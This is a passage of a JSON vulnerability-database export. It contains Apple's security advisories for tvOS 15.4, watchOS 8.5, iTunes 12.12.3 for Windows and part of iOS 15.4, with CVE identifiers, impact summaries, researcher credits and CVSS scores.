"CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22621", "CVE-2022-22624", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22630", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22639", "CVE-2022-22640", "CVE-2022-22641", "CVE-2022-22643", "CVE-2022-22644", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22651", "CVE-2022-22655", "CVE-2022-22656", "CVE-2022-22657", "CVE-2022-22660", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22663", "CVE-2022-22664", "CVE-2022-22665", "CVE-2022-22668", "CVE-2022-22669", "CVE-2022-22672", "CVE-2022-26688", "CVE-2022-26690", "CVE-2022-26691", "CVE-2022-46706"], "modified": "2022-03-14T00:00:00", "id": "APPLE:C9EF751487C406A634B9CBD013ECD410", "href": "https://support.apple.com/kb/HT213183", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T06:06:27", "description": "# About the security content of tvOS 15.4\n\nThis document describes the security content of tvOS 15.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 15.4\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2022-22633: ryuzaki\n\nEntry added May 25, 2022\n\n**Accelerate Framework**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry added May 25, 2022\n\n**AppleAVD**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.\n\n**AVEVideoEncoder**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2022-22634: an anonymous researcher\n\n**AVEVideoEncoder**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22635: an anonymous researcher\n\n**AVEVideoEncoder**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22636: an anonymous researcher\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22611: Xingyu Jin of Google\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2022-22612: Xingyu Jin of Google\n\n**IOGPUFamily**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22641: Mohamed Ghannam (@_simo36)\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22614: an anonymous researcher\n\nCVE-2022-22615: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22640: sqrtpwn\n\n**LLVM**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to delete files for which it does not have permission\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-21658: Florian Weimer (@fweimer)\n\nEntry added May 25, 2022\n\n**MediaRemote**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to identify what other applications a user has installed\n\nDescription: An access issue was addressed with improved access restrictions.\n\nCVE-2022-22670: Brandon Azad\n\n**Preferences**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to read other applications' settings\n\nDescription: The issue was addressed with additional permissions checks.\n\nCVE-2022-22609: Mickey Jin (@patch1t), and Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated June 7, 2023\n\n**Sandbox**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to bypass certain Privacy preferences\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran\n\nEntry updated May 25, 2022\n\n**UIKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22621: Joey Hewitt\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 232812 \nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 233172 \nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit Bugzilla: 234147 \nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nWebKit Bugzilla: 234966 \nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious website may cause unexpected cross-origin behavior\n\nDescription: A logic issue was addressed with improved state management.\n\nWebKit Bugzilla: 235294 \nCVE-2022-22637: Tom McKee of Google\n\n\n\n## Additional recognition\n\n**Bluetooth**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**Siri**\n\nWe would like to acknowledge an anonymous researcher for their assistance\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**UIKit**\n\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Abdullah Md Shaleh for their assistance.\n\n**WebKit Storage**\n\nWe would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: June 07, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of tvOS 15.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21658", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22621", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22634", "CVE-2022-22635", "CVE-2022-22636", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22640", "CVE-2022-22641", "CVE-2022-22662", "CVE-2022-22666", "CVE-2022-22670"], "modified": "2022-03-14T00:00:00", "id": "APPLE:B1225C474BECEE3D119CD5BC562422D7", "href": "https://support.apple.com/kb/HT213186", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T06:06:36", "description": "# About the security content of watchOS 8.5\n\nThis document describes the security content of watchOS 8.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 8.5\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry updated May 25, 2022\n\n**AppleAVD**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22611: Xingyu Jin of Google\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2022-22612: Xingyu Jin of Google\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22596: an anonymous researcher\n\nCVE-2022-22640: sqrtpwn\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22614: an anonymous researcher\n\nCVE-2022-22615: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**LaunchServices**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An app may be able to bypass certain Privacy preferences\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-30946: @gorelics, and Ron Masas of BreakPoint.sh\n\nEntry added June 6, 2023\n\n**libarchive**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Multiple issues in libarchive\n\nDescription: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.\n\nCVE-2021-36976\n\n**LLVM**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An application may be able to delete files for which it does not have permission\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-21658: Florian Weimer (@fweimer)\n\nEntry added May 25, 2022\n\n**MediaRemote**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to identify what other applications a user has installed\n\nDescription: An access issue was addressed with improved access restrictions.\n\nCVE-2022-22670: Brandon Azad\n\n**Phone**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A user may be able to bypass the Emergency SOS passcode prompt\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22618: Yicong Ding (@AntonioDing)\n\n**Preferences**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to read other applications' settings\n\nDescription: The issue was addressed with additional permissions checks.\n\nCVE-2022-22609: Mickey Jin (@patch1t), Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated June 6, 2023\n\n**Safari**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A user interface issue was addressed.\n\nCVE-2022-22654: Abdullah Md Shaleh of take0ver\n\n**Sandbox**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to bypass certain Privacy preferences\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran\n\nEntry updated May 25, 2022\n\n**Siri**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen\n\nDescription: A permissions issue was addressed with improved validation.\n\nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)\n\nEntry updated May 25, 2022\n\n**UIKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22621: Joey Hewitt\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 232812 \nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla 233172 \nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit Bugzilla: 234147 \nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nWebKit Bugzilla: 234966 \nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious website may cause unexpected cross-origin behavior\n\nDescription: A logic issue was addressed with improved state management.\n\nWebKit Bugzilla: 235294 \nCVE-2022-22637: Tom McKee of Google\n\n\n\n## Additional recognition\n\n**AirDrop**\n\nWe would like to acknowledge Omar Espino (omespino.com), Ron Masas of BreakPoint.sh for their assistance.\n\n**Bluetooth**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**Face Gallery**\n\nWe would like to acknowledge Tian Zhang (@KhaosT) for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Konstantin Darutkin of FingerprintJS (fingerprintjs.com) for their assistance.\n\n**Shortcuts**\n\nWe would like to acknowledge Baibhav Anand Jha of Streamers Land for their assistance.\n\n**Siri**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**UIKit**\n\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.\n\n**Wallet**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Abdullah Md Shaleh for their assistance.\n\n**WebKit Storage**\n\nWe would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: June 06, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of watchOS 8.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30946", "CVE-2021-36976", "CVE-2022-21658", "CVE-2022-22596", "CVE-2022-22599", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22618", "CVE-2022-22621", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22640", "CVE-2022-22654", "CVE-2022-22662", "CVE-2022-22666", "CVE-2022-22670"], "modified": "2022-03-14T00:00:00", "id": "APPLE:EDE954643057FF821E196BB6445A667D", "href": "https://support.apple.com/kb/HT213193", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-12T06:06:44", "description": "# About the security content of iTunes 12.12.3 for Windows\n\nThis document describes the security content of iTunes 12.12.3 for Windows.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iTunes 12.12.3 for Windows\n\nReleased March 8, 2022\n\n**ImageIO**\n\nAvailable for: Windows 10 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22611: Xingyu Jin of Google\n\n**ImageIO**\n\nAvailable for: Windows 10 and later\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2022-22612: Xingyu Jin of Google\n\n**WebKit**\n\nAvailable for: Windows 10 and later\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**WebKit**\n\nAvailable for: Windows 10 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nWebKit Bugzilla: 234966 \nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 10 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: Windows 10 and later\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nEntry added May 25, 2022\n\n\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 25, 2022\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-08T00:00:00", "type": "apple", "title": "About the security content of iTunes 12.12.3 for Windows", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22629", "CVE-2022-22662"], "modified": "2022-03-08T00:00:00", "id": "APPLE:ABB9418710E096AFBBD70F254214F920", "href": "https://support.apple.com/kb/HT213188", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-26T22:44:27", "description": "# About the security content of iOS 15.4 and iPadOS 15.4\n\nThis document describes the security content of iOS 15.4 and iPadOS 15.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 15.4 and iPadOS 15.4\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry updated May 25, 2022\n\n**AppleAVD**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.\n\n**AVEVideoEncoder**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2022-22634: an anonymous researcher\n\n**AVEVideoEncoder**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22635: an anonymous researcher\n\n**AVEVideoEncoder**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22636: an anonymous researcher\n\n**Cellular**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A person with physical access may be able to view and modify the carrier account information and settings from the lock screen\n\nDescription: The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel.\n\nCVE-2022-22652: Ka\u011fan E\u011flence (linkedin.com/in/kaganeglence), O\u011fuz K\u0131rat (@oguzkirat)\n\nEntry updated May 25, 2022\n\n**CoreMedia**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An app may be able to learn information about the current camera view before being granted camera access\n\nDescription: An issue with app access to camera metadata was addressed with improved logic.\n\nCVE-2022-22598: Will Blaschko of Team Quasko\n\n**CoreTypes**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks to prevent unauthorized actions.\n\nCVE-2022-22663: Arsenii Kostromin (0x3c3e)\n\nEntry added May 25, 2022\n\n**FaceTime**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A user may be able to bypass the Emergency SOS passcode prompt\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22642: Yicong Ding (@AntonioDing)\n\n**FaceTime**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A user may send audio and video in a FaceTime call without knowing that they have done so\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida\n\n**GPU Drivers**\n\nAvailable for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An application may be able to execute 